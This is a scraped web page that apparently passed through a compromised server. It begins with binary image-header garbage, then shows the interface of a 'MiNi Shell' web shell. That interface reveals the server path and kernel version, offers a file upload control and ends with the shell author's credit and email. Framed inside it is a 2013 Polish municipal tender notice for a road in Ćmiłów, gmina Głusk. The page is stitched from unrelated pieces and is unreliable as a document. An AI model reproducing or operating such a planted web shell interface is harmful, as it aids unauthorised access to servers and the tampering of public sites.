JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130219/70412-N-2013.html

<p class="kh_header"><b>Lublin: BUDOWA DROGI GMINNEJ NR  112454 L - ul. Kwiatów Polnych wraz z włączeniem do drogi woj. Nr 835 w miejscowości Ćmiłów, gmina Głusk</b><br>
<b>Numer ogłoszenia: 70412 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Głusk , ul. Głuska 140, 20-380 Lublin, woj. lubelskie, tel. 81 7518760, faks 81 7518650.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glusk.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA DROGI GMINNEJ NR  112454 L - ul. Kwiatów Polnych wraz z włączeniem do drogi woj. Nr 835 w miejscowości Ćmiłów, gmina Głusk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> BUDOWA DROGI GMINNEJ NR  112454 L - ul. Kwiatów Polnych
 w miejscowości Ćmiłów  wraz z włączeniem do drogi wojewódzkiej nr 835 , gmina Głusk obejmująca wykonanie odcinka drogi o długości 321 mb i włączenia do drogi wojewódzkiej na odcinku 7 mb o nawierzchni  z kostki brukowej i jednostronnego chodnika  z kostki brukowej w szczególności polegająca  na wykonywaniu następujących rodzajów  robót drogowych:
3.1 - Roboty przygotowawcze i ziemne ;
     -  Krawężniki betonowe o wymiarach 15x30 cm z wykonaniem ław betonowych na podsypce cementowo-piaskowej;
    -   Krawężniki betonowe o wymiarach 20x30 cm  z wykonaniem ław betonowych na podsypce cementowo-piaskowej ( na włączeniu do drogi woj.)
    -  Podbudowę  pod nawierzchnię : w-wa odcinająca z piasku gr. 6cm , stabilizacja 2,5 MPa gr.15 cm , podbudowa z kruszywa łamanego , gr.  25 cm , podsypka z grysu 2-4 mm gr.3 cm;
    -  Nawierzchnię jezdni  z kostki brukowej  szarej ,gr. 8 cm i szerokości 6 m.
    -  Chodnik z kostki brukowej szarej gr. 6 cm i szerokości 1,5 m i 2,0 m na podbudowie betonowej ( stabilizacja 2,5 MPa) gr. 10 cm i podsypce cementowo-piaskowej gr. 4 cm;
 UWAGA !  Zamawiający w tym postępowaniu realizuje chodnik tylko po 1 stronie drogi (lewa) , chodnik po prawej stronie będzie zrealizowany w drugim etapie i nie jest on liczony w tym przedmiarze robót.
    -  Zjazdy do posesji z kostki brukowej gr. 8 cm na podbudowie betonowej (stabilizacja 5 MPa) gr.15 cm.
    - Przepust  rurowy betonowy o śr.60 cm na ławie betonowej  gr. 15 cm ( na włączeniu z drogą woj. nr 835 ) + przepusty o śr. 50 cm wzdłuż drogi wojewódzkiej.
-   Roboty wykończeniowe (plantowanie skarp , rowy wzdłuż drogi wojewódzkiej , humusowanie skarp z obsianiem ) 
-   regulacja pionowych studzienek kanalizacyjnych oraz wykonanie  5 sztuk  podłączeń do istniejącej  
    sieci   kanalizacyjnej  o długości około 40 mb .Podłączenia  należy wykonać rurą PCV o średnicy  160 mm od istniejącej studni do granicy działki  z zakorkowaniem );
-   Zabezpieczenie istniejących kabli energetycznych rurami ochronnymi dwudzielnymi z PCV ;
-   Oznakowanie poziome i pionowe drogi i włączenia do drogi wojewódzkiej.
-   Pełna obsługa geodezyjna z dokumentacją powykonawczą drogi.
-   Zawiadomienie Zakładu Energetycznego PGE Dystrybucja O/Lublin , ul. Elektryczna 2 o planowanym wykonaniu zabezpieczeń kabli SN i  nN oraz dokonanie odbioru zabezpieczeń przy udziale przedstawiciela ZE.
-   Oraz wszelkie inne roboty  wymienione w pkt. 3.6 
3.2 Zakres rzeczowy robót przedstawiony został w :
        projekcie wykonawczym ;
        specyfikacji technicznej wykonania i odbioru robót;
        przedmiarze robót
        w ustaleniach organizacyjnych związanych z wykonaniem zamówienia pkt.3.6
           które stanowią załączniki do niniejszej specyfikacji istotnych warunków zamówienia .
3.3. Zamawiający zaleca dokonanie wizji w terenie ( na drodze ) przed przystąpieniem do  przygotowania   oferty.
3.4.  Wymagania dotyczące robót:
       1) Wszystkie prace winny być zrealizowane zgodnie z przepisami ,obowiązującymi normami, warunkami technicznymi i sztuką budowlaną , przepisami bhp, ppoż., zgodnie z poleceniami inspektora nadzoru.
       2) Roboty należy prowadzić zgodnie z wymogami dokumentacji określającymi przedmiot zamówienia , specyfikacja techniczną wykonania i odbioru robót budowlanych oraz wymogami niniejszej specyfikacji.
3.5    Wymagania dotyczące  materiałów :
        1) Użyte materiały winny być w pierwszym  gatunku jakościowym i wymiarowym, posiadających odpowiednie dopuszczenia do stosowania w budownictwie .
      2) Wykonawca zobowiązany będzie dostarczyć deklaracje zgodności na użyte materiały z wymaganymi załącznikami przed ich wbudowaniem inspektorowi nadzoru.
3.6     Ustalenia organizacyjne związane z wykonaniem zamówienia.
              W ramach zadania należy przewidzieć /wykonać :
         1)  Przed przystąpieniem do robót drogowych (podbudowy)  wykonać      5 sztuk  podłączeń do istniejącej  sieci   kanalizacyjnej  o długości około 40 mb .Podłączenia należy wykonać rurą PCV  średnica 160 mm  od istniejącej studni do granicy działki z zakorkowaniem);
        2) Geodezyjną obsługę  inwestycji  tj.  wytyczenie trasy drogi , inwentaryzowanie na bieżąco wykonanych przyłączy kanalizacyjnych przed wykonaniem podbudowy , wykonanie geodezyjnej dokumentacji powykonawczej  . Oddzielnie dla drogi i oddzielnie dla włączenia do drogi wojewódzkiej w ilości po 2 egz.
        3) Właściwe oznakowanie  robót i terenu budowy ( zgodnie z projektami tymczasowej i stałej  organizacji ruchu)
        4) Utrzymanie terenu budowy ( drogi ) w stanie wolnym od przeszkód komunikacyjnych oraz usuwanie na bieżąco zbędnych materiałów i odpadów ( w tym: gruntu z wykopu, kostki  brukowej itp.)
        5) Ubezpieczenie prac budowlanych z tytułu odpowiedzialności za wypadki i szkody wyrządzone   przy realizacji robót drogowych.
        6) Ponoszenie odpowiedzialności finansowej za szkody wyrządzone właścicielom lub użytkownikom posesji, na których prowadzona jest inwestycja oraz sąsiadujących z terenem  budowy.
       7) Zabezpieczenie we własnym zakresie wody i energii elektrycznej niezbędnej do wykonania  robót i ponoszenie kosztów ich zużycia.
       8) Dokonanie niezbędnych badań , prób i pomiarów w celu sprawdzenia prawidłowości wykonanych robót ( wskaźniki zagęszczenia podłoża po wykonaniu przyłączy , zagęszczenia podbudowy itp.)
       9) Zapewnienie dostępu ( dojścia i dojazdu)  do posesji ich mieszkańcom i użytkownikom podczas  prowadzenia robót.
      10) Naprawa uszkodzonych urządzeń uzbrojenia podziemnego i nadziemnego spowodowanych prowadzonymi robotami budowlanymi - w uzgodnieniu z ich administratorami.
     11) Naprawa ogrodzeń oraz usuwanie innych uszkodzeń istniejących obiektów i elementów zagospodarowania terenu, spowodowanych prowadzonymi robotami budowlanymi wraz z przedstawieniem Zamawiającemu oświadczeń właścicieli nieruchomości potwierdzającymi przywrócenie terenu do stanu pierwotnego ( lub lepszego).
    12) Uporządkowanie terenu budowy i zaplecza pod budowę po zakończeniu robót.
    13) Innych prac , których wykonanie będzie niezbędne   dla prawidłowej realizacji i funkcjonowania przedmiotu zamówienia
    14) Wykonawca odpowiedzialny będzie za całokształt, w tym za przebieg , jakość  oraz terminowe wykonanie  zamówienia.
3.7  Wymagania dotyczące gwarancji:
     1) Wykonawca obejmie gwarancją całość przedmiotu zamówienia na okres minimum 5 lat , licząc od daty  odbioru bez zastrzeżeń całość zamówienia.
     2) Reklamacje dotyczące stwierdzonych usterek i wad załatwiane będą z należytą starannością w 
         terminie 14 dni od zgłoszenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Na podstawie art. 67 ust.1 pkt 6 ustawy Pzp Zamawiający zastrzega sobie prawo do udzielania Wykonawcy zamówień uzupełniających do wysokości 50% w zakresie niezbędnym dla prawidłowego wykonania zamówienia. 
Dane wyjściowe do kosztorysowania przedstawione przez Wykonawcę w załącznikach do oferty (kosztorys ofertowy z cenami jednostkowymi ) robót podstawowych  będą miały zastosowanie do ewentualnych robót  dodatkowych  lub uzupełniających, których konieczność wykonania zostanie uzgodniona pomiędzy Zamawiającym a Wykonawcą w trakcie realizacji zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.32.22-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Składający ofertę obowiązany jest przed upływem terminu składania ofert wnieść wadium w     
     wysokości 6.000,- złotych ( słownie: sześć  tysięcy złotych)
2. Termin wniesienia wadium upływa dnia 06.03.2013 r. o godz. 1000 . 
3. O uznaniu przez zamawiającego ,że wadium w pieniądzu wniesiono w wymaganym terminie, 
    decyduje data wpływu środków na rachunek zamawiającego.
4. Wadium może być wniesione w pieniądzu, przelewem na rachunek bankowy Zamawiającego  nr :  
24 8689 0007 0000 3580 2000 0060 lub w formach wymienionych w art. 45 ust 6 pkt. 2-5 ustawy Pzp. 5. Do oferty należy dołączyć dokument potwierdzający wniesienie wadium lub jego poświadczoną kopię.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest zrealizowanie  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, przynajmniej dwóch robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia ( wykonanie nawierzchni z kostki brukowej )  wraz dokumentem potwierdzającym ,że roboty te były wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest dysponowanie  następującym sprzętem:
 - koparko-ładowarką o poj. Łyżki min. 0,4 m3 - min. 1 szt.
 - walcem samojezdnym stalowym ( typ ciężki ) - min.1 szt.
 - zagęszczarkami o wadze min. 120 kg - min.1 szt.
 - samochodami ciężarowymi samowyładowczymi o ładowności min. 10 t - min. 2 szt ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest  dysponowanie osobą  ,która będzie uczestniczyć w  wykonaniu  zamówienia na stanowisku kierownika budowy ,posiadającą  uprawnienia budowlane w specjalności konstrukcyjno-budowlanej , drogowej z co najmniej 5 letnim doświadczeniem , która pełniła funkcję kierownika budowy przy co najmniej dwóch robotach budowlanych obejmujących budowę nawierzchni z kostki brukowej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  wymagane jest posiadanie opłaconej polisy  potwierdzającej że wykonawca jest ubezpieczony  od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia  na kwotę co najmniej 200.000 zł przez cały okres realizacji zamówienia.
- posiadanie środków finansowych lub zdolności kredytowej na kwotę nie mniejszą niż 500.000 zł

Wykonawca może polegać na wiedzy i doświadczeniu , potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolności finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia , w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo , zgodnie z art.23 ust.2 ustawy pzp, w przypadku składania oferty przez  wykonawców ubiegających się wspólnie o udzielenie zamówienia;
- dowód zapłaty wadium;
- zaakceptowany wzór umowy wg wzoru zamawiającego o treści odpowiadającej  załącznikowi nr 7 do  siwz</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Główne postanowienia określone są w umowie, której projekt stanowi załącznik nr 7 do niniejszej SIWZ. Zamawiający przyjmuje, że postanowienia projektu umowy nie zakwestionowane pisemnie 
w ofercie zostaną uznane przez Wykonawcę za wiążące w chwili podpisania umowy. W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą Zamawiającego. Zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę. Zmiany umowy muszą być dokonywane z zachowaniem przepisu art. 140 ust.3 ustawy Pzp, stanowiącego, że umowa jest nieważna w części wykraczającej poza określenie przedmiotu zamówienia zawarte w SIWZ.
Zamawiający dopuszcza możliwość zmiany umowy w zakresie dotyczącym :
-  terminów wykonania robót w przypadku:
a)   wystąpienia klęsk żywiołowych,
b) wystąpienia warunków atmosferycznych odbiegających od typowych, uniemożliwiających prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów,
c)  odmowy wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę, 
d)  wycofanie zgody na prowadzenie robót budowlanych przez właściciela nieruchomości, 
e)   innych przyczyn niezależnych od Wykonawcy;
-  personelu wskazanego w ofercie Wykonawcy :
a) zmiana kierownika budowy lub kierowników robót w trakcie realizacji przedmiotu umowy musi być uzasadniona przez Wykonawcę na piśmie i zaakceptowana przez Zamawiającego, który zaakceptuje taką zmianę wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji i do doświadczenia osób wskazanych w ofercie Wykonawcy;
b) Wykonawca przedłoży Zamawiającemu propozycję zmiany, o której mowa w pkt. a) nie później niż 7 dni przed planowanym do kierowania robotami/budową którejkolwiek osoby. Jakakolwiek przerwa w realizacji przedmiotu umowy wynikająca z braku kierownictwa robót (budowy) będzie traktowana jako przerwa wynikła z przyczyn zależnych od Wykonawcy i nie może stanowić podstawy do zmiany terminu zakończenia robót;
c) skierowanie, bez akceptacji Zamawiającego, do kierowania robotami innych osób niż wskazane w ofercie Wykonawcy stanowi podstawę odstąpienia od umowy przez Zamawiającego z winy Wykonawcy;
- zmiany technologiczne:
a) konieczność zrealizowania robót przy zastosowaniu innych rozwiązań technicznych niż wskazane w projekcie budowlanym w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub ich wadliwym wykonaniem - zmiany te nie mogą powodować zwiększenia wynagrodzenia Wykonawcy.
-  zmiany zakresu robót o roboty nieprzewidziane
a)  Zamawiający może zmniejszyć zakres realizacji umowy,
b)  Zamawiający może zmienić ilości poszczególnych kategorii robót - roboty zamienne,
c) Zamawiający może udzielić wykonawcy zamówień dodatkowych, nieobjętych zamówieniem podstawowym, nie wynikających z projektów budowlano-wykonawczych, STWiOR i SIWZ zgodnie 
z warunkami określonymi w ustawie Pzp; 
d) udzielenie zamówienia na roboty dodatkowe następuje w wyniku konieczności przystąpienia do robót wykraczających poza zakres zamówienia podstawowego - Wykonawca składa wniosek 
o udzielenie zamówienia wraz z uzasadnieniem i wyceną (protokół konieczności), który zostanie przeanalizowany przez Zamawiającego;
e) tylko udzielenie zamówienia na roboty dodatkowe w drodze umowy upoważnia wykonawcę do żądania zapłaty za roboty dodatkowe;
- innych warunków umowy, jeżeli w chwili jej zawarcia nie znane były fakty mające na nie wpływ, przy jednoczesnym założeniu, że zakres zmian spowoduje następstwa korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ugglusk.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Głusk 20-388 Lublin ul. Miodowa 1 pok. Nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2013 godzina 10:00, miejsce: Urząd Gminy Głusk 20-388 Lublin ul. Głuska 140 Pok. Nr 1 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com